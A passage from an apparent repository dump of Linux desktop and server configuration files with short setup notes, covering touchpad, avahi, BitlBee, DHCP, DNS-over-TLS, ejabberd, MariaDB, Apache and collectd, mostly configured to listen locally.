"3" 19 | 20 | Option "CircularScrolling" "1" 21 | 22 | # This option is recommend on all Linux systems using evdev, but cannot be 23 | # enabled by default. See the following link for details: 24 | # http://who-t.blogspot.com/2010/11/how-to-ignore-configuration-errors.html 25 | MatchDevicePath "/dev/input/event*" 26 | EndSection 27 | 28 | Section "InputClass" 29 | Identifier "touchpad ignore duplicates" 30 | MatchIsTouchpad "on" 31 | MatchOS "Linux" 32 | MatchDevicePath "/dev/input/mouse*" 33 | Option "Ignore" "on" 34 | EndSection 35 | 36 | # This option enables the bottom right corner to be a right button on 37 | # non-synaptics clickpads. 38 | # This option is only interpreted by clickpads. 39 | Section "InputClass" 40 | Identifier "Default clickpad buttons" 41 | MatchDriver "synaptics" 42 | Option "SoftButtonAreas" "50% 0 82% 0 0 0 0 0" 43 | # To disable the bottom edge area so the buttons only work as buttons, 44 | # not for movement, set the AreaBottomEdge 45 | # Option "AreaBottomEdge" "82%" 46 | EndSection 47 | 48 | # This option disables software buttons on Apple touchpads. 49 | # This option is only interpreted by clickpads. 50 | Section "InputClass" 51 | Identifier "Disable clickpad buttons on Apple touchpads" 52 | MatchProduct "Apple|bcm5974" 53 | MatchDriver "synaptics" 54 | Option "SoftButtonAreas" "0 0 0 0 0 0 0 0" 55 | EndSection 56 | -------------------------------------------------------------------------------- /etc-desktop/avahi/avahi-daemon.conf: -------------------------------------------------------------------------------- 1 | # This file is part of avahi. 2 | # 3 | # avahi is free software; you can redistribute it and/or modify it 4 | # under the terms of the GNU Lesser General Public License as 5 | # published by the Free Software Foundation; either version 2 of the 6 | # License, or (at your option) any later version. 7 | # 8 | # avahi is distributed in the hope that it will be useful, but WITHOUT 9 | # ANY WARRANTY; without even the implied warranty of MERCHANTABILITY 10 | # or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public 11 | # License for more details. 12 | # 13 | # You should have received a copy of the GNU Lesser General Public 14 | # License along with avahi; if not, write to the Free Software 15 | # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 16 | # USA. 17 | 18 | # See avahi-daemon.conf(5) for more information on this configuration 19 | # file! 20 | 21 | [server] 22 | #host-name=foo 23 | #domain-name=local 24 | #browse-domains=0pointer.de, zeroconf.org 25 | use-ipv4=yes 26 | use-ipv6=yes 27 | #allow-interfaces=eth0 28 | #deny-interfaces=eth1 29 | #check-response-ttl=no 30 | #use-iff-running=no 31 | #enable-dbus=yes 32 | #disallow-other-stacks=no 33 | #allow-point-to-point=no 34 | #cache-entries-max=4096 35 | #clients-max=4096 36 | #objects-per-client-max=1024 37 | #entries-per-entry-group-max=32 38 | ratelimit-interval-usec=1000000 39 | ratelimit-burst=1000 40 | 41 | [wide-area] 42 | enable-wide-area=yes 43 | 44 | [publish] 45 | # Default configuration, for a server: 46 | #disable-publishing=no 47 | #disable-user-service-publishing=no 48 | #add-service-cookie=no 49 | #publish-addresses=yes 50 | #publish-hinfo=yes 51 | #publish-workstation=yes 52 | #publish-domain=yes 53 | #publish-dns-servers=192.168.50.1, 192.168.50.2 54 | #publish-resolv-conf-dns-servers=yes 55 | #publish-aaaa-on-ipv4=yes 56 | #publish-a-on-ipv6=no 57 | 58 | # To hide a workstation, add this line: 59 | disable-publishing=yes 60 | 61 | [reflector] 62 | #enable-reflector=no 63 | #reflect-ipv=no 64 | 65 | [rlimits] 66 | #rlimit-as= 67 | rlimit-core=0 68 | rlimit-data=4194304 69 | rlimit-fsize=0 70 | rlimit-nofile=768 71 | rlimit-stack=4194304 72 | rlimit-nproc=3 73 | -------------------------------------------------------------------------------- /etc-desktop/index.rst: -------------------------------------------------------------------------------- 1 | ``/etc`` for Desktop 2 | ==================== 3 | 4 | .. toctree:: 5 | :maxdepth: 1 6 | :glob: 7 | 8 | ** 9 | -------------------------------------------------------------------------------- /etc-server/bitlbee/bitlbee.conf: -------------------------------------------------------------------------------- 1 | [settings] 2 | ## RunMode: 3 | ## 4 | ## Inetd -- Run from inetd (default) 5 | ## Daemon -- Run as a stand-alone daemon, serving all users from one process. 6 | ## This saves memory if there are more users, the downside is that when one 7 | ## user hits a crash-bug, all other users will also lose their connection. 8 | ## ForkDaemon -- Run as a stand-alone daemon, but keep all clients in separate 9 | ## child processes. This should be pretty safe and reliable to use instead 10 | ## of inetd mode. 11 | ## 12 | # RunMode = Inetd 13 | RunMode = ForkDaemon 14 | 15 | ## DaemonPort/DaemonInterface: 16 | ## 17 | ## For daemon mode, you can specify on what interface and port the daemon 18 | ## should be listening for connections. 19 | ## 20 | ## DEBIAN NOTE: The init script passes the -p flag to use the port number 21 | ## set using debconf, this overrides the DaemonPort setting here. 22 | ## 23 | # DaemonInterface = 0.0.0.0 24 | # DaemonPort = 6667 25 | DaemonInterface = 127.0.0.1 26 | -------------------------------------------------------------------------------- /etc-server/bitlbee/bitlbee.conf.rst: -------------------------------------------------------------------------------- 1 | ``etc-server/bitlbee/``: BitlBee IRC gateway 2 | =============================================== 3 | 4 | BitlBee (https://www.bitlbee.org/) is an IRC gateway to other chat networks. 5 | Once installed, it seems good to restrict BitlBee to listen only on the loopback interface. 6 | Modify ``/etc/bitlbee/bitlbee.conf``: 7 | 8 | .. literalinclude:: bitlbee.conf 9 | :language: ini 10 | 11 | Then, start BitlBee daemon and connect to the IRC gateway, for example with WeeChat:: 12 | 13 | # Configure the server and connect to it 14 | /server add bitlbee localhost/6667 -autoconnect 15 | /connect bitlbee 16 | 17 | # Register the account in BitlBee control channel 18 | register 19 | 20 | # In WeeChat, save the password 21 | /secure set bitlbee_password 22 | /set irc.server.bitlbee.command "/msg &bitlbee identify ${sec.data.bitlbee_password}" 23 | 24 | Then, in BitlBee control channel (``&bitlbee``), add a Twitter account for example (https://wiki.bitlbee.org/HowtoTwitter):: 25 | 26 | account add twitter 27 | 28 | # Force using commands in order to post a new tweet 29 | account twitter set commands strict 30 | 31 | # Disable streams (cf. https://wiki.bitlbee.org/HowtoTwitter/StreamDeprecation) 32 | account twitter set stream off 33 | 34 | # Connect to Twitter 35 | account twitter on 36 | 37 | # Follow an other Twitter account 38 | add twitter 39 | -------------------------------------------------------------------------------- /etc-server/dhcp/dhcpd.conf: -------------------------------------------------------------------------------- 1 | # 2 | # Sample configuration file for ISC dhcpd for Debian 3 | # Debian package: isc-dhcp-server 4 | # Firewall rules: allow UDP ingoing traffic from 68 to 67 on interface eth0: 5 | # iptables -I INPUT -i eth0 -p udp --sport 68 --dport 67 -j ACCEPT 6 | # iptables -I OUTPUT -o eth0 -p udp --sport 67 --dport 68 -j ACCEPT 7 | # 8 | 9 | # The ddns-updates-style parameter controls whether or not the server will 10 | # attempt to do a DNS update when a lease is confirmed. We default to the 11 | # behavior of the version 2 packages ('none', since DHCP v2 didn't 12 | # have support for DDNS.) 13 | ddns-update-style none; 14 | 15 | # option definitions common to all supported networks... 16 | option domain-name "example.org"; 17 | option domain-name-servers 192.168.1.1, 208.67.222.222; 18 | 19 | default-lease-time 600; 20 | max-lease-time 7200; 21 | 22 | # If this DHCP server is the official DHCP server for the local 23 | # network, the authoritative directive should be uncommented. 24 | #authoritative; 25 | 26 | # Use this to send dhcp log messages to a different log file (you also 27 | # have to hack syslog.conf to complete the redirection). 28 | log-facility local7; 29 | 30 | # No service will be given on this subnet, but declaring it helps the 31 | # DHCP server to understand the network topology. 32 | 33 | #subnet 10.152.187.0 netmask 255.255.255.0 { 34 | #} 35 | 36 | # This is a very basic subnet declaration. 37 | 38 | #subnet 10.254.239.0 netmask 255.255.255.224 { 39 | # range 10.254.239.10 10.254.239.20; 40 | # option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org; 41 | #} 42 | 43 | # This declaration allows BOOTP clients to get dynamic addresses, 44 | # which we don't really recommend. 45 | 46 | #subnet 10.254.239.32 netmask 255.255.255.224 { 47 | # range dynamic-bootp 10.254.239.40 10.254.239.60; 48 | # option broadcast-address 10.254.239.31; 49 | # option routers rtr-239-32-1.example.org; 50 | #} 51 | 52 | # A slightly different configuration for an internal subnet. 53 | #subnet 10.5.5.0 netmask 255.255.255.224 { 54 | # range 10.5.5.26 10.5.5.30; 55 | # option domain-name-servers ns1.internal.example.org; 56 | # option domain-name "internal.example.org"; 57 | # option routers 10.5.5.1; 58 | # option broadcast-address 10.5.5.31; 59 | # default-lease-time 600; 60 | # max-lease-time 7200; 61 | #} 62 | 63 | # Hosts which require special configuration options can be listed in 64 | # host statements. If no address is specified, the address will be 65 | # allocated dynamically (if possible), but the host-specific information 66 | # will still come from the host declaration. 67 | 68 | #host passacaglia { 69 | # hardware ethernet 0:0:c0:5d:bd:95; 70 | # filename "vmunix.passacaglia"; 71 | # server-name "toccata.fugue.com"; 72 | #} 73 | 74 | # Fixed IP addresses can also be specified for hosts. These addresses 75 | # should not also be listed as being available for dynamic assignment. 76 | # Hosts for which fixed IP addresses have been specified can boot using 77 | # BOOTP or DHCP. Hosts for which no fixed address is specified can only 78 | # be booted with DHCP, unless there is an address range on the subnet 79 | # to which a BOOTP client is connected which has the dynamic-bootp flag 80 | # set. 81 | #host fantasia { 82 | # hardware ethernet 08:00:07:26:c0:a5; 83 | # fixed-address fantasia.fugue.com; 84 | #} 85 | 86 | # You can declare a class of clients and then do address allocation 87 | # based on that. The example below shows a case where all clients 88 | # in a certain class get addresses on the 10.17.224/24 subnet, and all 89 | # other clients get addresses on the 10.0.29/24 subnet. 90 | 91 | #class "foo" { 92 | # match if substring (option vendor-class-identifier, 0, 4) = "SUNW"; 93 | #} 94 | 95 | #shared-network 224-29 { 96 | # subnet 10.17.224.0 netmask 255.255.255.0 { 97 | # option routers rtr-224.example.org; 98 | # } 99 | # subnet 10.0.29.0 netmask 255.255.255.0 { 100 | # option routers rtr-29.example.org; 101 | # } 102 | # pool { 103 | # allow members of "foo"; 104 | # range 10.17.224.10 10.17.224.250; 105 | # } 106 | # pool { 107 | # deny members of "foo"; 108 | # range 10.0.29.10 10.0.29.230; 109 | # } 110 | #} 111 | 112 | # These options are used to add static routes 113 | option rfc3442-classless-static-routes code 121 = array of integer 8; 114 | option ms-classless-static-routes code 249 = array of integer 8; 115 | 116 | # Publish static a route to 192.168.1.0/24 via 10.13.37.1 117 | subnet 10.13.37.0 netmask 255.255.255.0 { 118 | range 10.13.37.100 10.13.37.200; 119 | option routers 10.13.37.1; 120 | option rfc3442-classless-static-routes 24, 192, 168, 1, 10, 13, 37, 1; 121 | option ms-classless-static-routes 24, 192, 168, 1, 10, 13, 37, 1; 122 | } 123 | -------------------------------------------------------------------------------- /etc-server/dhcp/dnsmasq.conf: -------------------------------------------------------------------------------- 1 | # Configuration file for dnsmasq. 2 | # 3 | # Format is one option per line, legal options are the same 4 | # as the long options legal on the command line. See 5 | # "/usr/sbin/dnsmasq --help" or "man 8 dnsmasq" for details. 6 | 7 | # Listen on this specific port instead of the standard DNS port 8 | # (53). Setting this to zero completely disables DNS function, 9 | # leaving only DHCP and/or TFTP. 10 | #port=5353 11 | port=0 12 | 13 | # If you want dnsmasq to listen for DHCP and DNS requests only on 14 | # specified interfaces (and the loopback) give the name of the 15 | # interface (eg eth0) here. 16 | # Repeat the line for more than one interface. 17 | interface=eth0 18 | # Or you can specify which interface _not_ to listen on 19 | #except-interface= 20 | # Or which to listen on by address (remember to include 127.0.0.1 if 21 | # you use this.) 22 | #listen-address= 23 | # If you want dnsmasq to provide only DNS service on an interface, 24 | # configure it as shown above, and then use the following line to 25 | # disable DHCP and TFTP on it. 26 | #no-dhcp-interface= 27 | 28 | # On systems which support it, dnsmasq binds the wildcard address, 29 | # even when it is listening on only some interfaces. It then discards 30 | # requests that it shouldn't reply to. This has the advantage of 31 | # working even when interfaces come and go and change address. If you 32 | # want dnsmasq to really bind only the interfaces it is listening on, 33 | # uncomment this option. About the only time you may need this is when 34 | # running another nameserver on the same machine. 35 | #bind-interfaces 36 | 37 | # If you don't want dnsmasq to read /etc/hosts, uncomment the 38 | # following line. 39 | #no-hosts 40 | # or if you want it to read another file, as well as /etc/hosts, use 41 | # this. 42 | #addn-hosts=/etc/banner_add_hosts 43 | 44 | # Set this (and domain: see below) if you want to have a domain 45 | # automatically added to simple names in a hosts-file. 46 | #expand-hosts 47 | 48 | # Set the domain for dnsmasq. this is optional, but if it is set, it 49 | # does the following things. 50 | # 1) Allows DHCP hosts to have fully qualified domain names, as long 51 | # as the domain part matches this setting. 52 | # 2) Sets the "domain" DHCP option thereby potentially setting the 53 | # domain of all systems configured by DHCP 54 | # 3) Provides the domain part for "expand-hosts" 55 | #domain=thekelleys.org.uk 56 | 57 | # Set a different domain for a particular subnet 58 | #domain=wireless.thekelleys.org.uk,192.168.2.0/24 59 | 60 | # Same idea, but range rather then subnet 61 | #domain=reserved.thekelleys.org.uk,192.68.3.100,192.168.3.200 62 | 63 | # Uncomment this to enable the integrated DHCP server, you need 64 | # to supply the range of addresses available for lease and optionally 65 | # a lease time. If you have more than one network, you will need to 66 | # repeat this for each network on which you want to supply DHCP 67 | # service. 68 | dhcp-range=10.13.37.100,10.13.37.200,12h 69 | 70 | # For debugging purposes, log each DNS query as it passes through 71 | # dnsmasq. 72 | #log-queries 73 | 74 | # Log lots of extra information about DHCP transactions. 75 | #log-dhcp 76 | -------------------------------------------------------------------------------- /etc-server/dhcp/dnsmasq.conf.rst: -------------------------------------------------------------------------------- 1 | ``etc-server/dhcp/dnsmasq.conf`` and doc 2 | ======================================== 3 | 4 | Full example configuration file for dnsmasq can be downloaded at: 5 | http://thekelleys.org.uk/gitweb/?p=dnsmasq.git;a=blob;f=dnsmasq.conf.example 6 | 7 | The following command spawns a DHCP server on interface ``eth0`` which gives IP 8 | addresses in range 10.13.37.100..10.13.37.200 and tells its clients to use 9 | 192.168.1.1 as primary DNS server:: 10 | 11 | dnsmasq -kd -i eth0 --dhcp-range=10.13.37.100,10.13.37.200 --dhcp-option=6,192.168.1.1 12 | 13 | By the way, here are iptables commands to open UDP ports for DHCP and DNS server:: 14 | 15 | iptables -I INPUT -i eth0 -p udp --sport 68 --dport 67 -j ACCEPT 16 | iptables -I OUTPUT -o eth0 -p udp --sport 67 --dport 68 -j ACCEPT 17 | iptables -I INPUT -i eth0 -p udp --dport 53 -j ACCEPT 18 | iptables -I OUTPUT -o eth0 -p udp --sport 53 -j ACCEPT 19 | 20 | Here is ``/etc/dnsmasq.conf`` for a DHCP server (no IPv6, no DNS): 21 | (:download:`Download file`) 22 | 23 | .. literalinclude:: dnsmasq.conf 24 | :language: sh 25 | -------------------------------------------------------------------------------- /etc-server/dns/unbound-with-stubby.conf: -------------------------------------------------------------------------------- 1 | # Configuration for using stubby DNS-over-TLS implementation with Unbound 2 | # Unbound listens on port 53 (DNS) while Stubby listens on port 8053 3 | # cf. https://dnsprivacy.org/wiki/display/DP/DNS+Privacy+Clients#DNSPrivacyClients-Unbound/Stubbycombination 4 | 5 | # /etc/unbound/unbound.conf.d/forward-to-stubby.conf 6 | server: 7 | do-not-query-localhost: no 8 | forward-zone: 9 | name: "." 10 | forward-addr: 127.0.0.1@8053 11 | forward-addr: ::1@8053 12 | 13 | # /etc/stubby/stubby.yml 14 | resolution_type: GETDNS_RESOLUTION_STUB 15 | dns_transport_list: 16 | - GETDNS_TRANSPORT_TLS 17 | tls_authentication: GETDNS_AUTHENTICATION_REQUIRED 18 | tls_query_padding_blocksize: 128 19 | edns_client_subnet_private : 1 20 | round_robin_upstreams: 1 21 | idle_timeout: 10000 22 | listen_addresses: 23 | - 127.0.0.1@8053 24 | - 0::1@8053 25 | upstream_recursive_servers: 26 | - address_data: 9.9.9.9 27 | tls_auth_name: "dns.quad9.net" 28 | - address_data: 1.1.1.1 29 | tls_auth_name: "cloudflare-dns.com" 30 | - address_data: 1.0.0.1 31 | tls_auth_name: "cloudflare-dns.com" 32 | -------------------------------------------------------------------------------- /etc-server/dns/unbound.conf: -------------------------------------------------------------------------------- 1 | # This file summaries several files for Unbound configuration, in one file for 2 | # clarity purposes. 3 | 4 | # /etc/unbound/unbound.conf 5 | # On Debian this file only contains one non-commented line: 6 | include: "/etc/unbound/unbound.conf.d/*.conf" 7 | 8 | # /etc/unbound/unbound.conf.d/root-auto-trust-anchor-file.conf 9 | server: 10 | # The following line will configure unbound to perform cryptographic 11 | # DNSSEC validation using the root trust anchor. 12 | auto-trust-anchor-file: "/var/lib/unbound/root.key" 13 | 14 | # /etc/unbound/unbound.conf.d/localhost.conf 15 | # Allow access from localhost 16 | server: 17 | interface: 127.0.0.1 18 | interface: ::1 19 | access-control: 127.0.0.0/8 allow 20 | access-control: ::1/128 allow 21 | 22 | # /etc/unbound/unbound.conf.d/vpn.conf 23 | # Allow access from VPN clients in 10.0.0.0/24 network 24 | server: 25 | interface: 10.0.0.1 26 | access-control: 10.0.0.0/24 allow 27 | -------------------------------------------------------------------------------- /etc-server/index.rst: -------------------------------------------------------------------------------- 1 | ``/etc`` for Server 2 | =================== 3 | 4 | .. toctree:: 5 | :maxdepth: 1 6 | :glob: 7 | 8 | ** 9 | -------------------------------------------------------------------------------- /etc-server/jabber/ejabberd.rst: -------------------------------------------------------------------------------- 1 | ejabberd configuration 2 | ====================== 3 | 4 | Here is how ejabberd can be installed and configured on a Debian system. 5 | 6 | First install the package:: 7 | 8 | apt-get install ejabberd 9 | 10 | ``debconf`` asks for several things: 11 | 12 | - a domain name, like ``example.com`` 13 | - an account to administrate the server, let's call it ``admin`` 14 | 15 | Then, the configuration file (``/etc/ejabberd/ejabberd.cfg``) looks like:: 16 | 17 | %% Options which are set by Debconf and managed by ucf 18 | 19 | %% Admin user 20 | {acl, admin, {user, "admin", "example.com"}}. 21 | 22 | %% Hostname 23 | {hosts, ["example.com"]}. 24 | 25 | 26 | By default, ejabberd listens on 3 TCP ports:: 27 | 28 | {listen, 29 | [ 30 | {5222, ejabberd_c2s, [ 31 | {access, c2s}, 32 | {shaper, c2s_shaper}, 33 | {max_stanza_size, 65536}, 34 | %%zlib, 35 | starttls, {certfile, "/etc/ejabberd/ejabberd.pem"} 36 | ]}, 37 | {5269, ejabberd_s2s_in, [ 38 | {shaper, s2s_shaper}, 39 | {max_stanza_size, 131072} 40 | ]}, 41 | {5280, ejabberd_http, [ 42 | %%{request_handlers, 43 | %% [ 44 | %% {["pub", "archive"], mod_http_fileserver} 45 | %% ]}, 46 | %%captcha, 47 | http_bind, 48 | http_poll, 49 | web_admin 50 | ]} 51 | ]}. 52 | {s2s_use_starttls, true}. 53 | {s2s_certfile, "/etc/ejabberd/ejabberd.pem"}. 54 | 55 | This enable web administration on an HTTP server running on port 5280. Use an 56 | URL such as to access to administration http://example.com:5280/admin/. Note 57 | that this is note secure (no HTTPS) so you may want to set-up a front-end to 58 | access to this server (reverse proxy, VPN, firewall, ...). 59 | 60 | To add a new user, you just need to run:: 61 | 62 | ejabberdctl register mynewuser example.com 'UserPassword' 63 | 64 | 65 | DNS configuration 66 | ----------------- 67 | Here is how a DNS zone may be configured:: 68 | 69 | ;service.proto.name class rr pri weight port target 70 | _jabber._tcp.example.com. IN SRV 10 0 5269 jabber.example.com. 71 | _xmpp-server._tcp.example.com. IN SRV 10 0 5269 jabber.example.com. 72 | _xmpp-client._tcp.example.com. IN SRV 10 0 5222 jabber.example.com. 73 | 74 | jabber IN A 10.22.33.44 75 | 76 | 77 | Bitlbee configuration 78 | --------------------- 79 | Bitlbee can be used to interact with jabber through an IRC server. 80 | Here are some useful commands from http://wiki.bitlbee.org/quickstart:: 81 | 82 | account add jabber bitlbee@example.com UserPassword 83 | account jabber on 84 | 85 | In ``account list``, this new account is associated with an ID (like 0). Once 86 | you know this ID, you may run:: 87 | 88 | add 0 myuser@example.com 89 | 90 | 91 | Source 92 | ------ 93 | http://wiki.linuxwall.info/doku.php/en:ressources:articles:ejabberd 94 | -------------------------------------------------------------------------------- /etc-server/mysql/my.cnf: -------------------------------------------------------------------------------- 1 | # Example MariaDB config file for medium systems. 2 | # 3 | # This is for a system with little memory (32M - 64M) where MariaDB plays 4 | # an important part, or systems up to 128M where MariaDB is used together with 5 | # other programs (such as a web server) 6 | # 7 | # MariaDB programs look for option files in a set of 8 | # locations which depend on the deployment platform. 9 | # You can copy this option file to one of those 10 | # locations. For information about these locations, do: 11 | # 'my_print_defaults --help' and see what is printed under 12 | # Default options are read from the following files in the given order: 13 | # More information at: http://dev.mysql.com/doc/mysql/en/option-files.html 14 | # 15 | # In this file, you can use all long options that a program supports. 16 | # If you want to know which options a program supports, run the program 17 | # with the "--help" option. 18 | 19 | # The following options will be passed to all MariaDB clients 20 | [client] 21 | #password = your_password 22 | port = 3306 23 | socket = /run/mysqld/mysqld.sock 24 | 25 | # Here follows entries for some specific programs 26 | 27 | # The MariaDB server 28 | [mysqld] 29 | port = 3306 30 | socket = /run/mysqld/mysqld.sock 31 | skip-external-locking 32 | key_buffer_size = 16M 33 | max_allowed_packet = 16M 34 | table_open_cache = 64 35 | sort_buffer_size = 512K 36 | net_buffer_length = 8K 37 | read_buffer_size = 256K 38 | read_rnd_buffer_size = 512K 39 | myisam_sort_buffer_size = 8M 40 | 41 | # Point the following paths to different dedicated disks 42 | #tmpdir = /tmp/ 43 | 44 | # Don't listen on a TCP/IP port at all. This can be a security enhancement, 45 | # if all processes that need to connect to mysqld run on the same host. 46 | # All interaction with mysqld must be made via Unix sockets or named pipes. 47 | # Note that using this option without enabling named pipes on Windows 48 | # (via the "enable-named-pipe" option) will render mysqld useless! 49 | # 50 | skip-networking 51 | 52 | # Replication Master Server (default) 53 | # binary logging is required for replication 54 | log-bin=mysql-bin 55 | 56 | # binary logging format - mixed recommended 57 | binlog_format=mixed 58 | 59 | # required unique id between 1 and 2^32 - 1 60 | # defaults to 1 if master-host is not set 61 | # but will not function as a master if omitted 62 | server-id = 1 63 | 64 | # Replication Slave (comment out master section to use this) 65 | # 66 | # To configure this host as a replication slave, you can choose between 67 | # two methods : 68 | # 69 | # 1) Use the CHANGE MASTER TO command (fully described in our manual) - 70 | # the syntax is: 71 | # 72 | # CHANGE MASTER TO MASTER_HOST=, MASTER_PORT=, 73 | # MASTER_USER=, MASTER_PASSWORD= ; 74 | # 75 | # where you replace , , by quoted strings and 76 | # by the master's port number (3306 by default). 77 | # 78 | # Example: 79 | # 80 | # CHANGE MASTER TO MASTER_HOST='125.564.12.1', MASTER_PORT=3306, 81 | # MASTER_USER='joe', MASTER_PASSWORD='secret'; 82 | # 83 | # OR 84 | # 85 | # 2) Set the variables below. However, in case you choose this method, then 86 | # start replication for the first time (even unsuccessfully, for example 87 | # if you mistyped the password in master-password and the slave fails to 88 | # connect), the slave will create a master.info file, and any later 89 | # change in this file to the variables' values below will be ignored and 90 | # overridden by the content of the master.info file, unless you shutdown 91 | # the slave server, delete master.info and restart the slaver server. 92 | # For that reason, you may want to leave the lines below untouched 93 | # (commented) and instead use CHANGE MASTER TO (see above) 94 | # 95 | # required unique id between 2 and 2^32 - 1 96 | # (and different from the master) 97 | # defaults to 2 if master-host is set 98 | # but will not function as a slave if omitted 99 | #server-id = 2 100 | # 101 | # The replication master for this slave - required 102 | #master-host = 103 | # 104 | # The username the slave will use for authentication when connecting 105 | # to the master - required 106 | #master-user = 107 | # 108 | # The password the slave will authenticate with when connecting to 109 | # the master - required 110 | #master-password = 111 | # 112 | # The port the master is listening on. 113 | # optional - defaults to 3306 114 | #master-port = 115 | # 116 | # binary logging - not required for slaves, but recommended 117 | #log-bin=mysql-bin 118 | 119 | # Uncomment the following if you are using InnoDB tables 120 | #innodb_data_home_dir = /var/lib/mysql 121 | #innodb_data_file_path = ibdata1:10M:autoextend 122 | #innodb_log_group_home_dir = /var/lib/mysql 123 | # You can set .._buffer_pool_size up to 50 - 80 % 124 | # of RAM but beware of setting memory usage too high 125 | #innodb_buffer_pool_size = 16M 126 | #innodb_additional_mem_pool_size = 2M 127 | # Set .._log_file_size to 25 % of buffer pool size 128 | #innodb_log_file_size = 5M 129 | #innodb_log_buffer_size = 8M 130 | #innodb_flush_log_at_trx_commit = 1 131 | #innodb_lock_wait_timeout = 50 132 | 133 | [mysqldump] 134 | quick 135 | max_allowed_packet = 16M 136 | 137 | [mysql] 138 | no-auto-rehash 139 | # Remove the next comment character if you are not familiar with SQL 140 | #safe-updates 141 | 142 | [myisamchk] 143 | key_buffer_size = 20M 144 | sort_buffer_size = 20M 145 | read_buffer = 2M 146 | write_buffer = 2M 147 | 148 | [mysqlhotcopy] 149 | interactive-timeout 150 | -------------------------------------------------------------------------------- /etc-server/web/apache.conf: -------------------------------------------------------------------------------- 1 | # This file contains some customizations from the default Apache configuration. 2 | # The main config file can be located in: 3 | # * /etc/httpd/conf/httpd.conf (ArchLinux) 4 | # * /etc/apache2/apache2.conf (Debian) 5 | # 6 | # Documentation: 7 | # * http://httpd.apache.org/docs/current/ 8 | # * https://wiki.archlinux.org/index.php/LAMP 9 | 10 | ServerSignature Off 11 | ServerTokens Prod 12 | 13 | # Configuration for a local web server 14 | ServerName localhost 15 | Listen 127.0.0.1:80 16 | Listen [::1]:80 17 | 18 | AllowOverride None 19 | 20 | 21 | Options Indexes FollowSymLinks 22 | AllowOverride None 23 | Require all granted 24 | # Apache <2.3 configuration: 25 | # 26 | # Order allow,deny 27 | # Allow from all 28 | # 29 | 30 | 31 | DirectoryIndex index.html 32 | 33 | 34 | 35 | Alias "/doc" "/usr/share/doc/" 36 | 37 | Options Indexes MultiViews FollowSymLinks 38 | AllowOverride None 39 | 40 | # "Require local" is better than: 41 | # Require ip 127.0.0.0/8 ::1/128 42 | # Require host localhost 43 | Require local 44 | 45 | # Apache <2.4 configuration: 46 | #Order deny,allow 47 | #Deny from all 48 | #Allow from 127.0.0.0/255.0.0.0 ::1/128 49 | 50 | # Disable PHP in this directory 51 | 52 | php_admin_value engine Off 53 | # If PHP is enabled, this directive restricts fopen 54 | php_admin_value open_basedir "/usr/share/doc/" 55 | 56 | 57 | 58 | -------------------------------------------------------------------------------- /etc-server/web/collectd.rst: -------------------------------------------------------------------------------- 1 | Collectd 2 | ======== 3 | 4 | Collectd is a daemon to collect system statistics in RRD (Round-Robin Database) 5 | files. It is basically a backend daemon and several front-end exist to navigate through the data. 6 | 7 | * Web site: https://collectd.org/ 8 | * Plugins: https://collectd.org/wiki/index.php/Table_of_Plugins 9 | * Front-ends: https://collectd.org/wiki/index.php/List_of_front-ends 10 | 11 | 12 | Installation 13 | ------------ 14 | 15 | Collectd is packaged for some Linux distribution. In Debian, this command 16 | installs collectd with the default configuration:: 17 | 18 | apt-get install collectd 19 | 20 | The configuration is done in ``/etc/collectd/collectd.conf``. It is quite 21 | straightforward and the wiki helps understanding the few tricky fields 22 | (https://collectd.org/wiki/index.php/Table_of_Plugins). 23 | 24 | Here is a basic configuration:: 25 | 26 | LoadPlugin syslog 27 | 28 | LogLevel info 29 | 30 | 31 | LoadPlugin cpu 32 | LoadPlugin df 33 | LoadPlugin disk 34 | LoadPlugin interface 35 | #LoadPlugin irq 36 | LoadPlugin load 37 | LoadPlugin memory 38 | LoadPlugin rrdtool 39 | #LoadPlugin sensors 40 | LoadPlugin swap 41 | 42 | 43 | Device "rootfs" 44 | # MountPoint "/home" 45 | FSType "cgroup" 46 | FSType "devtmpfs" 47 | FSType "tmpfs" 48 | FSType "overlay" 49 | FSType "squashfs" 50 | IgnoreSelected true 51 | ReportByDevice false 52 | ReportReserved true 53 | ReportInodes true 54 | 55 | 56 | # Don't collect statistitics about loopback interface 57 | Interface "lo" 58 | IgnoreSelected true 59 | 60 | 61 | DataDir "/var/lib/collectd/rrd/" 62 | 63 | 64 | Network setup 65 | ------------- 66 | 67 | To centralise collected data on a server, you need to use the network plugin 68 | (https://collectd.org/wiki/index.php/Plugin:Network). If your collectd daemon 69 | is recent enough, you may use authenticated and encrypted communication channels 70 | using a password. 71 | 72 | On the server, the configuration looks like this in ``collectd.conf``:: 73 | 74 | 75 | # Server IP and UDP port to listen to 76 | 77 | SecurityLevel Sign 78 | # This file contains for each user with password "secret": 79 | # user: secret 80 | AuthFile "/etc/collectd/passwd" 81 | Interface "eth0" 82 | 83 | MaxPacketSize 1024 84 | 85 | 86 | On each client, ``collectd.conf`` may contain:: 87 | 88 | 89 | 90 | SecurityLevel Encrypt 91 | Username "user" 92 | Password "secret" 93 | Interface "eth0" 94 | 95 | TimeToLive "128" 96 | 97 | 98 | 99 | Collection3 front-end 100 | --------------------- 101 | 102 | Collectd package often provides front-end examples among which is Collection3. 103 | This front-end is a web front-end written as a CGI script in Perl. 104 | By default it will look for RRD files in ``/var/lib/collectd/rrd`` but this 105 | can be changed by editing ``etc/collection.conf`` which contains by default:: 106 | 107 | DataDir "/var/lib/collectd/rrd" 108 | 109 | Collection3 needs some Perl modules: 110 | 111 | * ``Config::General`` 112 | * ``Regexp::Common`` 113 | * ``HTML::Entities`` 114 | * ``RRDs`` 115 | 116 | On a Debian server, this command installs the needed modules:: 117 | 118 | apt-get install lib{config-general,regexp-common,html-parser,rrds}-perl 119 | 120 | Apache virtual host configuration 121 | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 122 | :: 123 | 124 | 125 | Alias /collection3/ /usr/share/doc/collectd-core/examples/collection3/ 126 | ScriptAlias /collection3/bin/ /usr/share/doc/collectd-core/examples/collection3/bin/ 127 | 128 | AddHandler cgi-script .cgi 129 | DirectoryIndex bin/index.cgi 130 | Options +ExecCGI 131 | Order Allow,Deny 132 | Allow from all 133 | 134 | 135 | 136 | Nginx server configuration 137 | ~~~~~~~~~~~~~~~~~~~~~~~~~~ 138 | :: 139 | 140 | server { 141 | listen 80 default_server; 142 | location /collection3 { 143 | alias /usr/share/doc/collectd-core/examples/collection3; 144 | location ~ ^/collection3/bin/.+\.cgi$ { 145 | include fastcgi_params; 146 | fastcgi_pass unix:/var/run/fcgiwrap.socket; 147 | } 148 | location /collection3/share { 149 